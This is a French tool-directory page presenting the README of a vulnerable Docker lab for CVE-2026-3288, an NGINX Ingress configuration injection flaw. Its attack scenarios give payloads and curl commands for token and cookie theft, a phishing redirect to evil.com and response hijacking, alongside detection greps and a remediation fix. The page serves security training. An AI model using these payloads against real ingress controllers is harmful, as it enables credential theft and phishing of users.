Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/bvabhishek/cve-2026-3288-lab
Sécurité de l'Infrastructure CloudSécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebAudit de ConfigurationTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubbvabhishek/cve-2026-3288-lab

CVE-2026-3288-lab

# Laboratoire vulnérable basé sur Docker pour CVE-2026-3288 NGINX Ingress configuration injection, avec scripts d'exploitation, surveillance de détection et conseils de remédiation pour une formation en sécurité autorisée.

Voir le dépôt
1il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-3288 Laboratoire Vulnérable (Docker)

Injection de Configuration dans NGINX Ingress Controller

⚠️ AVERTISSEMENT : Ce laboratoire contient des configurations intentionnellement vulnérables pour FORMATION EN SÉCURITÉ AUTORISÉE UNIQUEMENT

Présentation de la Vulnérabilité

CVE-2026-3288 (CVSS 8.8 ÉLEVÉ) - Injection de configuration dans NGINX Ingress Controller

  • Versions Affectées : < v1.13.8, v1.14.4, v1.15.0
  • Vecteur d'Attaque : Injection de guillemets doubles (") dans la configuration des chemins
  • Impact : Exécution de Code à Distance, Divulgation de Secrets, Vol d'Identifiants
  • Lié à : CVE-2026-24512 (injection de chemin similaire)

Cause Racine

La fonction buildProxyPass() ne nettoie pas l'entrée du chemin avant de l'interpoler dans la configuration nginx, permettant aux attaquants de sortir des chaînes entre guillemets et d'injecter des directives nginx arbitraires.

Composants du Laboratoire

root@kitploit:~
CVE-2026-3288-lab/
├── README.md                          # Ce fichier
├── docker-compose.yml                 # Configuration principale du laboratoire
├── docker/
│   ├── nginx/
│   │   ├── Dockerfile                # Configuration NGINX vulnérable
│   │   ├── nginx.conf                # Configuration de base
│   │   └── vulnerable-config.conf    # Gestion vulnérable des chemins
│   └── backend/
│       ├── Dockerfile                # Application backend simple
│       └── app.py                    # Application Flask
├── exploits/
│   ├── exploit.py                    # Script d'exploitation automatisé
│   ├── payloads.txt                  # Collection de payloads d'exploitation
│   └── test-exploits.sh              # Teste toutes les exploitations
├── detection/
│   └── monitor-logs.sh               # Surveille les tentatives d'exploitation
└── cleanup/
    └── cleanup.sh                    # Supprime toutes les ressources du laboratoire

Prérequis

  • Docker installé
  • Docker Compose installé
  • Python 3.6+ (pour les scripts d'exploitation)
  • curl ou wget
  • 2 Go de RAM minimum

Démarrage Rapide

1. Démarrer le Laboratoire

root@kitploit:~
cd CVE-2026-3288-lab

# Démarrer l'environnement vulnérable
docker-compose up -d

# Vérifier le statut
docker-compose ps

2. Vérifier l'Installation

root@kitploit:~
# Tester que le backend fonctionne
curl http://localhost:8080/

# Tester que NGINX fonctionne
curl http://localhost/

3. Exécuter les Exploits

root@kitploit:~
cd exploits

# Exploitation automatisée
python3 exploit.py --all

# Ou tester les exploits individuellement
bash test-exploits.sh

4. Surveiller les Journaux

root@kitploit:~
# Surveiller les journaux NGINX pour détecter les exploitations
docker-compose logs -f nginx

# Surveillance de détection
cd detection
bash monitor-logs.sh

5. Nettoyage

root@kitploit:~
docker-compose down -v

Scénarios d'Attaque

Scénario 1 : Détournement de Réponse

Injecter la directive nginx return pour servir du contenu contrôlé par l'attaquant.

Payload :

root@kitploit:~
/api" return 200 "HACKED BY ATTACKER

Test :

root@kitploit:~
curl 'http://localhost/api" return 200 "HACKED'

Scénario 2 : Vol d'Identifiants

Refléter les en-têtes Authorization dans la réponse pour voler les jetons Bearer.

Payload :

root@kitploit:~
/login" return 200 "Token: $http_authorization

Test :

root@kitploit:~
curl -H "Authorization: Bearer secret123" 'http://localhost/login" return 200 "Token: $http_authorization'

Scénario 3 : Redirection de Phishing

Rediriger les utilisateurs vers un site de phishing contrôlé par l'attaquant.

Payload :

root@kitploit:~
/" return 302 "https://evil.com/phishing

Test :

root@kitploit:~
curl -I 'http://localhost/" return 302 "https://evil.com/phishing'

Scénario 4 : Divulgation d'Adresse IP Interne

Divulguer des informations internes du serveur.

Payload :

root@kitploit:~
/" return 200 "Internal IP: $server_addr

Test :

root@kitploit:~
curl 'http://localhost/" return 200 "Internal IP: $server_addr'

Scénario 5 : Vol de Cookies

Voler les cookies de session.

Payload :

root@kitploit:~
/" return 200 "Cookies: $http_cookie

Test :

root@kitploit:~
curl -H "Cookie: session=abc123" 'http://localhost/" return 200 "Cookies: $http_cookie'

Comment Cela Fonctionne

Modèle de Code Vulnérable

root@kitploit:~
# Configuration vulnérable
location ~ "^/api" {
    rewrite "(?i)/api" /backend break;
    proxy_pass http://backend;
}

Exploitation

Lorsque le chemin contient ", cela brise la chaîne entre guillemets :

root@kitploit:~
# Entrée de l'attaquant : /api" return 200 "HACKED
# Résultat :
location ~ "^/api" return 200 "HACKED" {
    # La configuration d'origine est maintenant cassée
}

Détection

Surveillance des Journaux

root@kitploit:~
# Rechercher les motifs suspects
docker-compose logs nginx | grep -E '(return|rewrite|set).*"'

Détection Manuelle

root@kitploit:~
# Vérifier la configuration NGINX pour les directives injectées
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf | grep -A5 "location"

Remédiation

Actions Immédiates

  1. Validation des Entrées - Nettoyer toutes les entrées de chemins
  2. Échappement des Caractères Spéciaux - Échapper correctement " et \
  3. Utiliser des Listes Blanches - Autoriser uniquement les chemins connus comme sûrs
  4. Surveiller les Journaux - Alerter sur les motifs suspects

Correction du Code

root@kitploit:~
// Avant (vulnérable)
path := location.Path
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

// Après (corrigé)
path := sanitizeQuotedRegex(location.Path)
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

Objectifs Pédagogiques

Après avoir terminé ce laboratoire, vous comprendrez :

  1. ✅ Comment fonctionnent les vulnérabilités d'injection de configuration
  2. ✅ L'impact d'une validation insuffisante des entrées
  3. ✅ Plusieurs techniques d'exploitation
  4. ✅ Les méthodes de détection via l'analyse des journaux
  5. ✅ Les stratégies de remédiation appropriées

Dépannage

Les conteneurs ne démarrent pas

root@kitploit:~
# Vérifier les journaux
docker-compose logs

# Redémarrer
docker-compose restart

Port déjà utilisé

root@kitploit:~
# Changer les ports dans docker-compose.yml
# Ou arrêter les services conflictuels
sudo lsof -i :80

Les exploits ne fonctionnent pas

root@kitploit:~
# Vérifier que NGINX fonctionne
docker-compose ps nginx

# Vérifier la configuration NGINX
docker exec cve-2026-3288-nginx nginx -t

Avis de Sécurité

  • ⚠️ UNIQUEMENT à utiliser dans des environnements de laboratoire isolés
  • ⚠️ NE JAMAIS déployer sur des systèmes de production
  • ⚠️ NE JAMAIS exposer sur Internet
  • ⚠️ S'assurer d'une autorisation appropriée avant de tester
  • ⚠️ Suivre les pratiques de divulgation responsable

Références

  • Avis CVE-2026-3288
  • Correctif PR #14667
  • Analyse Sysdig

Créé à des fins de formation en sécurité autorisée et de recherche uniquement

Télécharger l’outil